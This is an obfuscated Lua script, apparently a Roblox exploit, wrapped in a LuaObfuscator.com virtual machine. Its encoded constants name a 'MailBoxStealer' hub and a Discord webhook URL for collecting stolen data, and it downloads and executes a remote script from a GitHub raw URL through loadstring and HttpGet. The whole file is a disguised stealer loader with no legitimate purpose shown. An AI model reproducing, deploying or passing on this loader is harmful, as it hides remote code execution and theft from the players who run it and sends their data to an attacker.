--[[

 .____                  ________ ___.    _____                           __                

 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 

 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \

 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/

 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   

         \/          \/         \/    \/                \/     \/     \/                   

          \_Welcome to LuaObfuscator.com   (Alpha 0.2.6) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v72=0;local v73;while true do if (v72==0) then v73=v2(v0(v30,16));if v19 then local v104=v5(v73,v19);v19=nil;return v104;else return v73;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v74=0 -0 ;local v75;while true do if ((0 + 0)==v74) then v75=(v31/((1832 -(1590 + 240))^(v32-1)))%((1983 -(582 + 1399))^(((v33-(1 + 0)) -(v32-(1 -0))) + 1 + 0)) ;return v75-(v75%(1 + 0)) ;end end else local v76=0 + 0 ;local v77;while true do if (v76==(0 + 0)) then v77=(8 -(474 -(5 + 463)))^(v32-(862 -((1420 -(613 + 539)) + 593))) ;return (((v31%(v77 + v77))>=v77) and (1 + (1176 -(721 + 455)))) or (0 + (0 -0)) ;end end end end local function v21()local v34=0;local v35;while true do if ((1 + (0 -0))==v34) then return v35;end if (v34==(0 -0)) then v35=v1(v16,v18,v18);v18=v18 + (4 -3) ;v34=682 -(439 + 242) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + (126 -(95 + 29)) );v18=v18 + 1 + 1 ;return (v37 * (160 + 96)) + v36 ;end local function v23()local v38=0 -0 ;local v39;local v40;local v41;local v42;while true do if ((1195 -((2710 -(1804 + 27)) + 315))==v38) then return (v42 * (16777925 -(285 + 424))) + (v41 * (65804 -(66 + 202))) + (v40 * 256) + v39 ;end if ((1005 -((753 -504) + 756))==v38) then v39,v40,v41,v42=v1(v16,v18,v18 + (7 -4) );v18=v18 + 4 ;v38=(1189 -852) -(59 + 277) ;end end end local function v24()local v43=v23();local v44=v23();local v45=1;local v46=(v20(v44,1 + 0 ,646 -(266 + 360) ) * ((52 -(7 + 43))^(1446 -(743 + 671)))) + v43 ;local v47=v20(v44,21,31);local v48=((v20(v44,1182 -(842 + 308) )==(1 -0)) and  -(1 + 0)) or (1790 -(62 + 1727)) ;if (v47==(0 + 0 + 0)) then if (v46==(0 + 0)) then return v48 * (0 + 0) ;else v47=1 + 0 ;v45=(1801 -(1782 + 19)) -0 ;end elseif (v47==(3958 -(1151 + 760))) then return ((v46==(0 -0)) and (v48 * (1/0))) or (v48 * NaN) ;end return v8(v48,v47-((24 + 2581) -(663 + (3259 -2340))) ) * (v45 + (v46/(((456 -(154 + 300)) + 0)^((990 -(146 + 700)) -92)))) ;end local function v25(v49)local v50=527 -(113 + 414) ;local v51;local v52;while true do if (v50==0) then v51=nil;if  not v49 then local v99=(0 -0) -0 ;while true do if ((0 + 0 + 0)==v99) then v49=v23();if (v49==(733 -(654 + 79))) then return "";end break;end end end v50=2 -1 ;end if ((6 -3)==v50) then return v6(v52);end if (v50==(1 + 0)) then v51=v3(v16,v18,(v18 + v49) -1 );v18=v18 + v49 ;v50=5 -(3 + 0) ;end if (v50==(2 + 0)) then v52={};for v96=92 -(72 + 19) , #v51 do v52[v96]=v2(v1(v3(v51,v96,v96)));end v50=7 -4 ;end end end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v53=1226 -(602 + 624) ;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v53==3) then v60=nil;while true do local v98=0 + 0 ;while true do if ((0 -0)==v98) then if (v54~=0) then else local v105=0;local v106;while true do if (0~=v105) then else v106=0;while true do if (v106==(1 + 0)) then v57={};v54=1 -0 ;break;end if (0==v106) then local v127=0 + 0 ;while true do if (v127==(1210 -(968 + 242))) then v55={};v56={};v127=1;end if (v127==(2 -1)) then v106=2 -1 ;break;end end end end break;end end end if (v54~=3) then else local v107=0;while true do if (v107==(1025 -(329 + 696))) then for v123=1 -0 ,v23() do v56[v123-(1 + 0) ]=v28();end for v125=1,v23() do v57[v125]=v23();end v107=287 -(93 + 193) ;end if (v107~=(2 -1)) then else return v58;end end end v98=68 -(58 + 9) ;end if (v98==1) then if (v54==(1 + 0)) then local v108=0 -0 ;while true do if (v108~=1) then else v60={};v54=1 + 1 ;break;end if (v108==(0 -0)) then local v121=0 -0 ;while true do if (v121==(212 -(54 + 158))) then v58={v55,v56,nil,v57};v59=v23();v121=1 + 0 ;end if (v121==1) then v108=1790 -(303 + 1486) ;break;end end end end end if (v54==2) then for v110=1,v59 do local v111=1928 -(145 + 1783) ;local v112;local v113;local v114;local v115;while true do if (v111==(1392 -(331 + 1059))) then while true do if (v112==0) then local v129=0 + 0 ;while true do if (v129==1) then v112=1120 -(303 + 816) ;break;end if (v129==0) then v113=0;v114=nil;v129=2 -1 ;end end end if (1==v112) then v115=nil;while true do if (v113==(600 -(23 + 577))) then v114=v21();v115=nil;v113=1;end if (1~=v113) then else if (v114==(1 + 0)) then v115=v21()~=(1629 -(381 + 1248)) ;elseif (v114==(1599 -(1202 + 395))) then v115=v24();elseif (v114~=(1 + 2)) then else v115=v25();end v60[v110]=v115;break;end end break;end end break;end if (v111~=1) then else v114=nil;v115=nil;v111=7 -5 ;end if (v111==(974 -(51 + 923))) then v112=0;v113=nil;v111=1 + 0 ;end end end v58[6 -3 ]=v21();for v116=1 -0 ,v23() do local v117=0;local v118;local v119;local v120;while true do if (v117==0) then v118=0 + 0 ;v119=nil;v117=1;end if (v117==(1 + 0)) then v120=nil;while true do if (v118~=(0 + 0)) then else v119=1011 -(939 + 72) ;v120=nil;v118=1404 -(1078 + 325) ;end if (v118~=(1803 -(1094 + 708))) then else while true do if (v119==0) then v120=v21();if (v20(v120,1,625 -(75 + 549) )==(1453 -(225 + 1228))) then local v153=0;local v154;local v155;local v156;local v157;local v158;while true do if (v153==0) then v154=0;v155=nil;v153=3 -2 ;end if (v153~=(1 + 0)) then else v156=nil;v157=nil;v153=8 -6 ;end if ((2 + 0)~=v153) then else v158=nil;while true do if (v154~=(1 + 1)) then else while true do if (0==v155) then local v177=0 -0 ;while true do if ((0 -0)==v177) then local v185=0;local v186;while true do if (v185~=0) then else v186=0;while true do if (v186~=1) then else v177=1;break;end if (0==v186) then v156=v20(v120,2,3);v157=v20(v120,4,6);v186=1869 -(678 + 1190) ;end end break;end end end if ((3 -2)~=v177) then else v155=1;break;end end end if (v155==(107 -(80 + 25))) then local v178=0;while true do if (v178==(0 + 0)) then if (v20(v157,660 -(450 + 209) ,4 -3 )==(628 -(478 + 149))) then v158[2 + 0 ]=v60[v158[5 -3 ]];end if (v20(v157,2 + 0 ,1345 -(204 + 1139) )==1) then v158[3]=v60[v158[1261 -(1140 + 118) ]];end v178=1 + 0 ;end if ((1 -0)~=v178) then else v155=1985 -(953 + 1029) ;break;end end end if (v155==3) then if (v20(v157,3,5 -2 )~=1) then else v158[10 -6 ]=v60[v158[3 + 1 ]];end v55[v116]=v158;break;end if (v155==1) then local v180=1430 -(990 + 440) ;while true do if (v180==(0 + 0)) then local v187=0;while true do if (v187==0) then local v193=0;while true do if (v193==(1402 -(1255 + 146))) then v187=1;break;end if (v193~=(0 -0)) then else v158={v22(),v22(),nil,nil};if (v156==0) then local v196=0 + 0 ;local v197;local v198;while true do if (v196==(1 + 0)) then while true do if (v197==(0 + 0)) then v198=0;while true do if (v198==(0 + 0)) then v158[3]=v22();v158[1 + 3 ]=v22();break;end end break;end end break;end if (v196==(161 -(151 + 10))) then v197=0;v198=nil;v196=1;end end elseif (v156==1) then v158[1430 -(643 + 784) ]=v23();elseif (v156==(1 + 1)) then v158[2 + 1 ]=v23() -((1100 -(518 + 580))^(13 + 3)) ;elseif (v156~=(1091 -(1053 + 35))) then else local v201=0;local v202;local v203;local v204;while true do if (1==v201) then v204=nil;while true do if (v202~=0) then else v203=0;v204=nil;v202=2 -1 ;end if (v202==(1 + 0)) then while true do if (v203==0) then v204=786 -(67 + 719) ;while true do if (v204==(1423 -(237 + 1186))) then v158[3 + 0 ]=v23() -((110 -(87 + 21))^16) ;v158[4]=v22();break;end end break;end end break;end end break;end if (0==v201) then v202=1170 -(181 + 989) ;v203=nil;v201=1 + 0 ;end end end v193=1;end end end if (v187==(1 + 0)) then v180=797 -(96 + 700) ;break;end end end if (v180==(1 -0)) then v155=2;break;end end end end break;end if (v154~=1) then else v157=nil;v158=nil;v154=2;end if (v154~=0) then else local v169=647 -(169 + 478) ;local v170;while true do if (0==v169) then v170=0;while true do if (v170~=(1 + 0)) then else v154=1 -0 ;break;end if (v170~=0) then else v155=200 -(118 + 82) ;v156=nil;v170=3 -2 ;end end break;end end end end break;end end end break;end end break;end end break;end end end v54=1720 -(1158 + 559) ;end break;end end end break;end if (v53==(2 + 0)) then local v88=0;while true do if (v88~=(2 -1)) then else v53=109 -(92 + 14) ;break;end if (v88~=0) then else v58=nil;v59=nil;v88=1;end end end if (v53~=(1 + 0)) then else v56=nil;v57=nil;v53=1 + 1 ;end if (v53==0) then local v89=0;while true do if (v89==0) then v54=752 -(716 + 36) ;v55=nil;v89=1;end if ((1 + 0)==v89) then v53=308 -(81 + 226) ;break;end end end end end local function v29(v61,v62,v63)local v64=v61[1];local v65=v61[2];local v66=v61[3];return function(...)local v67=1;local v68= -1;local v69={...};local v70=v12("#",...) -1 ;local function v71()local v78=v64;local v79=v65;local v80=v66;local v81=v27;local v82={};local v83={};local v84={};for v90=0 -0 ,v70 do if (((6626 -(6242 -(672 + 1325)))>(1561 + 495)) and (v90>=v80)) then v82[v90-v80 ]=v69[v90 + (3 -2) ];else v84[v90]=v69[v90 + 1 ];end end local v85=(v70-v80) + 1 + 0 ;local v86;local v87;while true do local v91=0 -0 ;local v92;local v93;while true do if ((4971==(8220 -3249)) and (v91==(0 + 0))) then v92=0 + 0 ;v93=nil;v91=1;end if ((v91==(1 -0)) or ((4113 -(1083 + 225))>=3164)) then while true do if ((v92==(1145 -(407 + 738))) or ((1599 -((4745 -3600) + 198))>3604)) then v93=0 + 0 ;while true do if (((5066 -(13004 -9866))<(5710 -(865 + 982))) and (v93==(630 -(244 + 385)))) then if ((v87<=((6 -3) + 0)) or ((17637 -13121)<(56 + 57 + 493))) then if ((993==(1230 -(15 + 222))) and (v87<=(1 + 0))) then if (((1935 -(432 + 973))<=(283 + 561 + 1075)) and (v87>0)) then v84[v86[2 -0 ]]=v63[v86[6 -(5 -2) ]];else local v132=0 -0 ;local v133;local v134;local v135;local v136;local v137;local v138;while true do if ((v132==(1023 -(404 + 409 + 209))) or ((5226 -1673)<=94)) then v135=nil;v136=nil;v132=165 -(104 + 59) ;end if ((((9363 -(822 + 265)) -4255)>(208 + 780)) and (v132==(1826 -(553 + 1273)))) then v133=0;v134=nil;v132=1 -0 ;end if ((v132==2) or ((3858 -(347 + (491 -(285 + 143))))>=(1036 + 3735))) then v137=nil;v138=nil;v132=1 + 2 ;end if (((1836 -(946 + 887))==v132) or ((5454 -(1333 + 267))<=(2923 -2278))) then while true do if ((v133==(1992 -((1128 -(726 + 123)) + 24 + 1689))) or ((1093 + 742)>=2319)) then local v160=710 -(382 + 328) ;while true do if (((34 + 70)<=4249) and (v160==(2 -1))) then v133=2 -1 ;break;end if (((2155 -(214 + 1071))==(2387 -(811 + 706))) and (v160==(0 + 0))) then v134=0 + 0 ;v135=nil;v160=1 + 0 ;end end end if ((((5761 + 705) -3794)==(1911 + 761)) and ((7 -(596 -(238 + 353)))==v133)) then v138=nil;while true do if ((198==(1343 -(338 + 495 + 312))) and (v134==(1 + 0))) then local v171=0 + 0 ;while true do if (((3368 -((333 -183) + 533))>=(795 -(48 + 149))) and (v171==(0 + 0))) then local v181=0 + 0 ;while true do if (((15321 -12021)==(5683 -2383)) and (v181==(2 -1))) then v171=3 -2 ;break;end if ((v181==(0 + 0)) or ((7012 -3126)<1224)) then v68=(v137 + v135) -1 ;v138=(3855 -2413) -(1223 + 219) ;v181=1 -0 ;end end end if ((v171==1) or ((8443 -5558)>=((11165 -7054) -(493 + 432)))) then v134=741 -(360 + 379) ;break;end end end if ((v134==(1127 -(1025 + 100))) or (377>=(1735 -544))) then for v173=v135,v68 do local v174=0 -0 ;local v175;local v176;while true do if ((v174==(0 -0)) or ((4256 -(62 + 178))==((18066 -9695) -3393))) then v175=0 + 0 ;v176=nil;v174=1765 -(754 + 1010) ;end if (((2782 -(287 + 17))>=(958 -546)) and (v174==1)) then while true do if (((540 -160)<=((1440 -(361 + 292)) + (765 -251))) and ((1808 -((894 -524) + 1438))==v175)) then v176=0;while true do if ((v176==0) or ((6174 -3976)>=4713)) then v138=v138 + (1962 -(1923 + 38)) ;v84[v173]=v136[v138];break;end end break;end end break;end end end break;end if (((5019 -(551 + 163))<(3766 + 167 + 595)) and (v134==(0 -0))) then local v172=0;while true do if (((4744 -(17 + 188))==(10584 -6045)) and (v172==(0 + 0))) then local v182=0 -0 ;while true do if ((0==v182) or (4984<=(207 -144))) then v135=v86[2];v136,v137=v81(v84[v135](v13(v84,v135 + 1 ,v86[3])));v182=552 -(277 + 274) ;end if (((505 -(452 + 52))==v182) or ((424 + 60 + 50)<=(452 -248))) then v172=3 -2 ;break;end end end if ((v172==(2 -1)) or ((4085 -2201)==3507)) then v134=1 + 0 ;break;end end end end break;end if (((603 -(152 + 450))==v133) or ((1116 + 2466)==(2613 + 1646))) then local v161=0 -0 ;while true do if ((v161==(792 -(40 + 488 + 258 + 5))) or ((5263 -(935 + 159))<=(3277 + 534 + 237))) then v133=1034 -(916 + 116) ;break;end if ((v161==(0 + 0 + 0)) or (504==3872)) then v136=nil;v137=nil;v161=1;end end end end break;end end end elseif ((v87>(1 + 1)) or (866>(1032 + 928))) then v84[v86[2]]=v86[(21 -13) -5 ];else v84[v86[2 + 0 ]][v86[1973 -(143 + 1827) ]]=v86[3 + 1 ];end elseif ((v87<=5) or ((5093 -(108 + 1801))<((2092 + 678) -(1367 + 320)))) then if (((7224 -3617)>(252 + 45)) and (v87==(3 + 1))) then local v143=0 -0 ;local v144;local v145;local v146;while true do if (((672 + 371)==1043) and (v143==((3308 -(986 + 661)) -(1236 + 425)))) then v144=1547 -(479 + 1068) ;v145=nil;v143=1 -0 ;end if (((2438 + 268)==2706) and (v143==(2 -1))) then v146=nil;while true do if ((v144==(92 -(65 + 26))) or (((5142 + 521) -(142 + 1294))<=(3768 -1984))) then v84[v145 + (1966 -(560 + 1405)) ]=v146;v84[v145]=v146[v86[2 + 2 ]];break;end if (((1383 + 1354)<=(5529 -(244 + 1044))) and (v144==(0 + 0))) then v145=v86[2 + 0 ];v146=v84[v86[3]];v144=1;end end break;end end else v84[v86[(8 -6) + 0 ]]();end elseif ((3487>(2991 + 146)) and (v87==(2 + 1 + 3))) then local v147=0 -0 ;local v148;local v149;while true do if ((v147==(0 -0)) or ((388 + 787)>=(3454 -(72 + 11)))) then local v159=1567 -((3499 -2483) + 551) ;while true do if (((4178 -(2446 -(363 + 674)))>1168) and (v159==(1 -(0 -0)))) then v147=13 -(4 + 8) ;break;end if ((v159==(417 -(275 + 142))) or (((5489 -(634 + 297)) -(1047 + 693))>(10279 -6339))) then v148=0;v149=nil;v159=954 -(727 + 226) ;end end end if (((2443 -661)<=(3292 -(844 + 311))) and (v147==(1785 -(1051 + 733)))) then while true do if ((((3834 -(947 + 915)) + 2396)<=(4519 + 264)) and (v148==(1181 -(417 + 764)))) then v149=v86[2];v84[v149]=v84[v149](v13(v84,v149 + 1 + 0 ,v68));break;end end break;end end else do return;end end v67=v67 + (3 -2) ;break;end if (((1561 -1073)<(1550 -(219 + 59))) and (v93==(0 + 0))) then local v122=42 -(20 + 22) ;while true do if (((2091 -(164 + 195))<=(12568 -9257)) and (((0 -0) -0)==v122)) then local v128=0;while true do if (((3757 -(1016 + 548))<=2225) and ((1 + (0 -0))==v128)) then v122=(4244 -3024) -(383 + 836) ;break;end if (((1394 + 632)<3498) and (v128==0)) then v86=v78[v67];v87=v86[1];v128=1;end end end if (((2715 + 1992)>=(3095 -1933)) and (v122==1)) then v93=1 + 0 + 0 ;break;end end end end break;end end break;end end end end A,B=v27(v11(v71));if  not A[1] then local v94=0;local v95;while true do if (v94==0) then v95=v61[4][v67] or "?" ;error("Script error at ["   .. v95   .. "]:"   .. A[2] );break;end end else return v13(A,2,B);end end;end return v29(v28(),{},v17)(...);end v15("LOL!0B3O0003023O005F4703083O00557365726E616D6503143O004A61636B546865432O6F6C447564655O3703073O004875624E616D65030E3O004D61696C426F78537465616C6572030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O31303136333531363430322O3830312O32342F734948725556726A704E793072386E4F5033415039484234326676454877494645364A655078547265506E43644369366A68424D5F556A585F55346D364243365136737A030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A61792O696F6365616E2O692F5065616B4F6E546F702F6D61696E2F7065616B2E6C7561000E3O0012013O00013O0030023O000200030012013O00013O0030023O000400050012013O00013O0030023O000600070012013O00083O001201000100093O00200400010001000A0012030003000B6O000100034O00065O00022O00053O000100012O00073O00017O000E3O00023O00023O00033O00033O00043O00043O00053O00053O00053O00053O00053O00053O00053O00063O00",v9(),...);end
